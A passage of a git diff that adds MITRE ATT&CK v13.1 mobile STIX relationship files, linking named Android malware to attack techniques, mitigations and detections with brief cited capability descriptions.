"attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--027a36dc-cd9e-4282-b101-b9a0abbb312f.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--027a36dc-cd9e-4282-b101-b9a0abbb312f.json new file mode 100644 index 0000000000000000000000000000000000000000..a4da1f9ad208801aa407aec22db226626a4aed0c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--027a36dc-cd9e-4282-b101-b9a0abbb312f.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--2a7935e6-1cdc-4e98-a50c-93a00283fc9c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--027a36dc-cd9e-4282-b101-b9a0abbb312f", + "type": "relationship", + "created": "2020-09-11T14:54:16.640Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T14:54:16.640Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can encrypt exfiltrated data.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0291c9d5-8977-420d-8374-b786e3095a73.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0291c9d5-8977-420d-8374-b786e3095a73.json new file mode 100644 index 0000000000000000000000000000000000000000..3ee7c2f2d9adaa9b9549a8b6229647264cfbe799 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0291c9d5-8977-420d-8374-b786e3095a73.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--60c68bb9-5f3c-4c27-b849-f655aaceaf8b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0291c9d5-8977-420d-8374-b786e3095a73", + "created": "2023-03-20T18:49:53.204Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:49:53.204Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02b3c8fe-1539-4c77-b67e-07fa8a22c91e.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02b3c8fe-1539-4c77-b67e-07fa8a22c91e.json new file mode 100644 index 0000000000000000000000000000000000000000..bba4e1b1d4a842d0eedc992bf6944179128ba044 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02b3c8fe-1539-4c77-b67e-07fa8a22c91e.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--f4e3731d-da40-4c81-8b7f-f9e40642aa3f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--02b3c8fe-1539-4c77-b67e-07fa8a22c91e", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-BrainTest", + "description": "Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "Some original variants of [BrainTest](https://attack.mitre.org/software/S0293) had the capability to automatically root some devices, but that behavior was not observed in later samples.(Citation: Lookout-BrainTest)", + "relationship_type": "uses", + "source_ref": "malware--e13d084c-382f-40fd-aa9a-98d69e20301e", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02b5cb07-9eb5-4e47-a4df-9c3985ad70fc.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02b5cb07-9eb5-4e47-a4df-9c3985ad70fc.json new file mode 100644 index 0000000000000000000000000000000000000000..2bca702cceffdddede75be32d01ab0acebf6a76b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02b5cb07-9eb5-4e47-a4df-9c3985ad70fc.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--8bd11247-a65b-487b-9e47-4c142356acfc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--02b5cb07-9eb5-4e47-a4df-9c3985ad70fc", + "created": "2021-10-01T14:42:49.174Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "description": "Alexey Firsh. (2018, August 29). BusyGasper \u2013 the unfriendly spy. Retrieved October 1, 2021.", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:26:41.762Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can abuse existing root access to copy components into the system partition.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02e4aedc-0674-4598-948b-0a32758af9ca.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02e4aedc-0674-4598-948b-0a32758af9ca.json new file mode 100644 index 0000000000000000000000000000000000000000..e765b091a09702e1126c645d0e41efa8c3ee8588 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02e4aedc-0674-4598-948b-0a32758af9ca.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--fd8aa277-23e5-465c-be60-eaafcdd1b684", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--02e4aedc-0674-4598-948b-0a32758af9ca", + "created": "2022-04-01T13:14:43.195Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T13:14:43.195Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--03038590-e0c3-4751-b6fb-8a9ffff27e1b.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--03038590-e0c3-4751-b6fb-8a9ffff27e1b.json new file mode 100644 index 0000000000000000000000000000000000000000..32f538c30e4c2bc28daf9bf6ee24797f2d8171c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--03038590-e0c3-4751-b6fb-8a9ffff27e1b.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--1450b511-32b0-4b91-8d08-c18febd01faa", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--03038590-e0c3-4751-b6fb-8a9ffff27e1b", + "type": "relationship", + "created": "2020-12-24T22:04:27.914Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T22:04:27.914Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has looked for .doc, .txt, .gif, .apk, .jpg, .png, .mp3, and .db files on external storage.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--03172b09-4f97-4fb8-95f0-92b2d8957408.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--03172b09-4f97-4fb8-95f0-92b2d8957408.json new file mode 100644 index 0000000000000000000000000000000000000000..3324f1efe90ba2e46f5c66cd5361474bbc0b0476 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--03172b09-4f97-4fb8-95f0-92b2d8957408.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--1682386b-dcdd-4fbf-8593-f80f900253c3", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--03172b09-4f97-4fb8-95f0-92b2d8957408", + "created": "2020-06-26T14:55:13.349Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[EventBot](https://attack.mitre.org/software/S0478) has encrypted base64-encoded payload data using RC4 and Curve25519.(Citation: Cybereason EventBot)", + "modified": "2022-04-18T15:57:14.375Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0330db55-06e0-45a2-85a6-17617a37fdaf.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0330db55-06e0-45a2-85a6-17617a37fdaf.json new file mode 100644 index 0000000000000000000000000000000000000000..91e379abc5072559afc4310691c63275c33fa7c5 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0330db55-06e0-45a2-85a6-17617a37fdaf.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--742fcfe1-4a75-4edc-946a-1015f60fbdbc", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0330db55-06e0-45a2-85a6-17617a37fdaf", + "created": "2022-04-06T13:57:49.186Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T13:57:49.186Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f981d199-2720-467e-9dc9-eea04dbe05cf", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--035192e3-94f4-426d-9be9-312ddd1ce6a8.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--035192e3-94f4-426d-9be9-312ddd1ce6a8.json new file mode 100644 index 0000000000000000000000000000000000000000..96dc99ccab907e1b8be3f2681cc25a5cb13774a0 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--035192e3-94f4-426d-9be9-312ddd1ce6a8.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--dd100834-eac2-4130-b0d6-c5cb87001d61", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--035192e3-94f4-426d-9be9-312ddd1ce6a8", + "created": "2019-11-21T16:42:48.437Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:22:18.013Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can collect SMS messages.(Citation: SecureList - ViceLeaker 2019)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--042a4f26-612e-4ed5-b7f3-911a47ec5d71.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--042a4f26-612e-4ed5-b7f3-911a47ec5d71.json new file mode 100644 index 0000000000000000000000000000000000000000..dd9f82123a4f18ccbdda3977824642aeaad9373f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--042a4f26-612e-4ed5-b7f3-911a47ec5d71.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--ba3f407d-f4ab-4b76-9412-af94cbd2109f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--042a4f26-612e-4ed5-b7f3-911a47ec5d71", + "created": "2022-04-18T15:49:00.561Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper \u2013 the unfriendly spy. Retrieved October 1, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can download text files with commands from an FTP server and exfiltrate data via email.(Citation: SecureList BusyGasper)", + "modified": "2022-04-18T15:49:00.561Z", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--37047267-3e56-453c-833e-d92b68118120", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04530307-22d8-4a06-9056-55eea225fabb.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04530307-22d8-4a06-9056-55eea225fabb.json new file mode 100644 index 0000000000000000000000000000000000000000..7758d89a95fe7a0f6980894230e20fa65c272ada --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04530307-22d8-4a06-9056-55eea225fabb.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--e56f2a06-1106-446c-bd87-c5db2dbc53b1", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--04530307-22d8-4a06-9056-55eea225fabb", + "type": "relationship", + "created": "2019-07-10T15:35:43.710Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-08-09T18:06:11.842Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) retrieves messages and decryption keys for popular messaging applications and other accounts stored on the device.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--046acda0-91de-4385-bcfb-157570d8e51d.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--046acda0-91de-4385-bcfb-157570d8e51d.json new file mode 100644 index 0000000000000000000000000000000000000000..6ba46277d8586e7b6056968b511902cb18362ddb --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--046acda0-91de-4385-bcfb-157570d8e51d.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--64a243f6-e88f-4134-9b3e-9d7339b08168", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--046acda0-91de-4385-bcfb-157570d8e51d", + "created": "2023-03-30T15:25:00.442Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T15:26:46.611Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can search for installed applications that match a list of targets.(Citation: cleafy_sova_1122)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049a5149-00c9-492a-8ffb-463f3d0cd910.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049a5149-00c9-492a-8ffb-463f3d0cd910.json new file mode 100644 index 0000000000000000000000000000000000000000..a744d6ce83daec2465756d2b5aebd8b9c69f9b8d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049a5149-00c9-492a-8ffb-463f3d0cd910.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--3cf8e3e8-7f29-4669-9357-f38537838740", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--049a5149-00c9-492a-8ffb-463f3d0cd910", + "created": "2022-03-30T20:13:28.442Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android 10 Limitations to Hiding App Icons", + "url": "https://source.android.com/setup/start/android-10-release#limitations_to_hiding_app_icons", + "description": "Android. (n.d.). Android 10 Release Notes: Limitations to hiding app icons. Retrieved March 30, 2022." + }, + { + "source_name": "LauncherApps getActivityList", + "url": "https://developer.android.com/reference/kotlin/android/content/pm/LauncherApps#getactivitylist", + "description": "Android. (n.d.). LauncherApps: getActivityList. Retrieved March 30, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 10 introduced changes to prevent malicious applications from fully suppressing their icon in the launcher.(Citation: Android 10 Limitations to Hiding App Icons)(Citation: LauncherApps getActivityList)", + "modified": "2022-05-20T17:16:08.998Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049b0c71-63e3-47ce-bb0b-149df0344b15.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049b0c71-63e3-47ce-bb0b-149df0344b15.json new file mode 100644 index 0000000000000000000000000000000000000000..31796eaf9087c8a6744dc35212c89d6c0c3510cf --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049b0c71-63e3-47ce-bb0b-149df0344b15.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--2b37c5b4-0503-4d43-b195-a0e229546cfb", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--049b0c71-63e3-47ce-bb0b-149df0344b15", + "created": "2020-12-24T21:45:56.965Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:15:59.861Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can access device contacts.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049c39ab-c036-457a-9b8f-4318416658b8.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049c39ab-c036-457a-9b8f-4318416658b8.json new file mode 100644 index 0000000000000000000000000000000000000000..753d334e68028cda514190dfe9fc5838b0709544 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--049c39ab-c036-457a-9b8f-4318416658b8.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--c08975ba-a60f-411f-952a-fb6dc0f99953", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--049c39ab-c036-457a-9b8f-4318416658b8", + "created": "2022-03-30T19:54:24.468Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "A locked bootloader could prevent unauthorized modifications of protected operating system files. ", + "modified": "2022-03-30T19:55:15.724Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04ae1d87-1741-4cfd-84ff-3c5e46c0b112.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04ae1d87-1741-4cfd-84ff-3c5e46c0b112.json new file mode 100644 index 0000000000000000000000000000000000000000..e8b1516bed7eff27fbf14a0008dbed4ad0625814 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04ae1d87-1741-4cfd-84ff-3c5e46c0b112.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--2ace3362-3f72-418e-995d-cd96cc326ba6", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--04ae1d87-1741-4cfd-84ff-3c5e46c0b112", + "created": "2022-04-05T19:59:03.285Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:59:03.285Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "target_ref": "attack-pattern--2ccc3d39-9598-4d32-9657-42e1c7095d26", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04ec5f2f-b14f-46ae-b151-05f9b7af0bcc.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04ec5f2f-b14f-46ae-b151-05f9b7af0bcc.json new file mode 100644 index 0000000000000000000000000000000000000000..f4fa98fb3795e7a012eebfeef96f50dfb7975ee4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04ec5f2f-b14f-46ae-b151-05f9b7af0bcc.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--53435d78-83d2-4db9-8b07-ac740f111868", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--04ec5f2f-b14f-46ae-b151-05f9b7af0bcc", + "created": "2023-03-20T18:37:57.767Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:37:57.767Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": 